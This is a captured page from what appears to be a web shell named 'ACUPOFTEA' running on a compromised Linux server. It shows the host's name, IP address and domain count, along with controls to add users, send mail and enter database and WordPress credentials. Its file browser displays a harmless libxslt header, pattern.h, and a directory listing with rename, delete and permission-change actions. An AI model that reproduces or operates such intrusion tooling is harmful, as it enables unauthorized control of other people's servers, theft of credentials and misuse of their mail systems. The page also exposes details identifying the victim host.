System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
libxslt
/
216.73.216.6
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
pattern.h
/* * Summary: interface for the pattern matching used in template matches. * Description: the implementation of the lookup of the right template * for a given node must be really fast in order to keep * decent performances. * * Copy: See Copyright for the status of this software. * * Author: Daniel Veillard */ #ifndef __XML_XSLT_PATTERN_H__ #define __XML_XSLT_PATTERN_H__ #include "xsltInternals.h" #include "xsltexports.h" #ifdef __cplusplus extern "C" { #endif /** * xsltCompMatch: * * Data structure used for the implementation of patterns. * It is kept private (in pattern.c). */ typedef struct _xsltCompMatch xsltCompMatch; typedef xsltCompMatch *xsltCompMatchPtr; /* * Pattern related interfaces. */ XSLTPUBFUN xsltCompMatchPtr XSLTCALL xsltCompilePattern (const xmlChar *pattern, xmlDocPtr doc, xmlNodePtr node, xsltStylesheetPtr style, xsltTransformContextPtr runtime); XSLTPUBFUN void XSLTCALL xsltFreeCompMatchList (xsltCompMatchPtr comp); XSLTPUBFUN int XSLTCALL xsltTestCompMatchList (xsltTransformContextPtr ctxt, xmlNodePtr node, xsltCompMatchPtr comp); XSLTPUBFUN void XSLTCALL xsltNormalizeCompSteps (void *payload, void *data, const xmlChar *name); /* * Template related interfaces. */ XSLTPUBFUN int XSLTCALL xsltAddTemplate (xsltStylesheetPtr style, xsltTemplatePtr cur, const xmlChar *mode, const xmlChar *modeURI); XSLTPUBFUN xsltTemplatePtr XSLTCALL xsltGetTemplate (xsltTransformContextPtr ctxt, xmlNodePtr node, xsltStylesheetPtr style); XSLTPUBFUN void XSLTCALL xsltFreeTemplateHashes (xsltStylesheetPtr style); XSLTPUBFUN void XSLTCALL xsltCleanupTemplates (xsltStylesheetPtr style); #if 0 int xsltMatchPattern (xsltTransformContextPtr ctxt, xmlNodePtr node, const xmlChar *pattern, xmlDocPtr ctxtdoc, xmlNodePtr ctxtnode); #endif #ifdef __cplusplus } #endif #endif /* __XML_XSLT_PATTERN_H__ */
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-08-28 10:58:31
..
DIR
-
drwxr-xr-x
2025-10-28 10:57:27
attributes.h
text/x-c
930 B
-rw-r--r--
2015-05-10 02:11:29
documents.h
text/x-c
2.64 KB
-rw-r--r--
2015-05-10 02:11:29
extensions.h
text/x-c
6.74 KB
-rw-r--r--
2012-09-04 02:26:23
extra.h
text/x-c
1.6 KB
-rw-r--r--
2017-08-29 11:20:04
functions.h
text/x-c
1.96 KB
-rw-r--r--
2015-05-10 02:11:29
imports.h
text/x-c
1.8 KB
-rw-r--r--
2015-05-10 02:11:29
keys.h
text/x-c
1.13 KB
-rw-r--r--
2015-05-10 02:11:29
namespaces.h
text/x-c
1.63 KB
-rw-r--r--
2015-05-10 02:11:30
numbersInternals.h
text/x-c
1.97 KB
-rw-r--r--
2015-05-10 02:11:30
pattern.h
text/x-c
1.95 KB
-rw-r--r--
2012-09-04 02:26:23
preproc.h
text/x-c
892 B
-rw-r--r--
2015-05-10 02:11:30
security.h
text/x-c
2.59 KB
-rw-r--r--
2015-05-10 02:11:30
templates.h
text/x-c
2.21 KB
-rw-r--r--
2015-05-10 02:11:30
transform.h
text/x-c
6.18 KB
-rw-r--r--
2015-02-27 06:00:23
variables.h
text/x-c
3.07 KB
-rw-r--r--
2025-08-26 08:55:04
xslt.h
text/x-c
1.92 KB
-rw-r--r--
2015-05-10 02:11:30
xsltInternals.h
text/x-c
56.14 KB
-rw-r--r--
2025-08-26 08:55:04
xsltconfig.h
text/x-c
3.5 KB
-rw-r--r--
2025-08-26 08:55:13
xsltexports.h
text/plain
3.35 KB
-rw-r--r--
2009-05-12 06:29:34
xsltlocale.h
text/x-c
1.51 KB
-rw-r--r--
2017-10-26 07:55:47
xsltutils.h
text/x-c
8.49 KB
-rw-r--r--
2025-08-26 08:55:04
~ ACUPOFTEA - mail.ontime-ae.com